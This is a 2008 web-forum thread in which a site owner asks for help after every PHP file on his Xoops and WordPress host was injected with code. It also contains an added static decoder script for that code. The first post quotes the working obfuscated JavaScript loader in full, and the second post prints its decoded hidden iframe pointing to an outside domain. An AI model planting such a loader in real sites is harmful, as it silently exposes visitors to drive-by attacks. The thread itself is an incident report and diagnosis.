Kraai

Was my site hacked? Please help.

  #1  
Jun 2nd, 2008
Hi everyone

I have a website, running for years without any problem, and all of a sudden, today, it does not display any pages. All is blank!

The website in question is a Xoops installation.

I accessed my directory and files via cpanel, and first went to see if I can see my index.php and yes, it seems like all files and folders are still there. I viewed the code on the index file, and found some script there that I am sure I haven't ever seen before. The same script appears on all other .php files in my public directory. I am very much a novice at php, and don't know what this means.

The script in question is as follows:

<?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>

Is there someone that can help me, first of all, to confirm that I was hacked, and secondly, understand this script on all my files, and thirdly, wisen me up on how to restore my site.

I was very stupid not to have any recent backup, but it appears my files are all there, as well as all the database.

Please help this poor monkey!
nav33n

  #2  
Jun 3rd, 2008
Hmm.. I am not sure if your site is hacked.. But when that javascript was 'decoded', it gave me the url, http://www.wp-stats-php.info/ . The complete URL was
<iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0>
Umm.. Have you seen this iframe before ? I have never been in this position before, so maybe someone else has something better to say..
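Added example (not code from any poster in this thread): a static decoder for the injected loader quoted in post #1, which recovers the iframe reported in post #2 without executing the script. It generalises to any shift constant; the sample is constructed from the quoted line and the file names in `FILES` are hypothetical.

```javascript
// Constructed sample: the injected line exactly as quoted in post #1.
const INJECTED = String.raw`<?php echo '<script type="text/javascript">function count(str){var res = "";for(i = 0; i < str.length; ++i) { n = str.charCodeAt(i); res += String.fromCharCode(n - (2)); } return res; }; document.write(count(">khtcog\"ute?jvvr<11yyy0yr/uvcvu/rjr0kphq1khtcog1yr/uvcvu0rjr\"ykfvj?3\"jgkijv?3\"htcogdqtfgt?2@"));</script>';?>`;

// Loader shape: fromCharCode(n - (K)) ... document.write(fn("literal")).
// Group 1 is the shift K, group 2 is the encoded string literal.
const LOADER = /fromCharCode\(\s*n\s*-\s*\(?(\d+)\)?\s*\)[\s\S]*?document\.write\(\s*\w+\(\s*"((?:\\.|[^"\\])*)"\s*\)\s*\)/;

// Reimplement the character shift on the extracted literal.
// The injected script itself is never evaluated.
function decodeInjection(source) {
  const m = LOADER.exec(source);
  if (!m) return null;
  const shift = Number(m[1]);
  // Undo simple JS escapes such as \" (enough for this loader's literal).
  const literal = m[2].replace(/\\(.)/g, "$1");
  const html = Array.from(literal, (c) =>
    String.fromCharCode(c.charCodeAt(0) - shift)
  ).join("");
  const src = /src=["']?([^\s"'>]+)/i.exec(html);
  return { shift, html, src: src ? src[1] : null };
}

// files: { path: contents }. Returns only the entries that carry the loader.
function scanFiles(files) {
  return Object.entries(files)
    .map(([path, text]) => ({ path, hit: decodeInjection(text) }))
    .filter((r) => r.hit !== null);
}

// Constructed file set standing in for a docroot (hypothetical names).
const FILES = {
  "index.php": INJECTED + "\n<?php echo 'site content'; ?>",
  "clean.php": "<?php echo 'hello'; ?>",
};

for (const { path, hit } of scanFiles(FILES)) {
  console.log(`${path}: shift=${hit.shift} -> ${hit.src}`);
}
```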
helraizer

  #3  
Jun 3rd, 2008
It's so-called "script injection".

Are you using Wordpress blogs or WP-Stats in your website? For they are particularly vulnerable. The way that is done is with specially crafted SQL using certain parameters to then gain access to the back-end database.

Check your database and see the post in there.
nav33n

  #4  
Jun 3rd, 2008
Originally Posted by helraizer:
It's so-called "script injection".

Are you using Wordpress blogs or WP-Stats in your website? For they are particularly vulnerable. The way that is done is with specially crafted SQL using certain parameters to then gain access to the back-end database.

Check your database and see the post in there.

Oh, cross-site scripting! Hmm..
helraizer

  #5  
Jun 3rd, 2008
Originally Posted by nav33n:
Oh, cross-site scripting! Hmm..

Yeah. XSS! Somehow they found an exploit in the posting of blogs on a user's site in which they use the HTML <!-- Comments --> <!-- Traffic Statistics --> Exploitary code here <!-- End Traffic Statistics -->

Perhaps the blog software uses SSI, which could explain something.

As for the OP's problem, I'm not sure how the heck the attacker injected php because php is server side so shouldn't execute from the page. =\
Kraai

  #6  
Jun 3rd, 2008
Thanks for all the replies.

Yes, I saw that the pages all were referring to http://www.wp-stats-php.info/ in the taskbar, until "done" and only a blank page displays.

Yes, there are two wordpress blogs on the domain.

No, the iframe should not be there.

The hacker even left me a message in one of the index php files of the main site, saying: "Silence is golden"

This is a very large site, and as said before, all php files were injected with this script.

The two wordpress blogs were in separate folders, and public access was /domainname/blogname/

On the main domain, is a Xoops installation.

What I understand, from this thread, is that the hacker gained access through the wordpress mysql database, and from there also attacked the Xoops database, injecting his script everywhere?

If I am able to restore a backup, where and how should I go and plug these holes in wordpress? I am a novice, and only know a little of database and php etc. That is one of the reasons I am on this forum, to learn from you who know, and I think Daniweb is one of the most resourceful knowledge building forums ever to exist.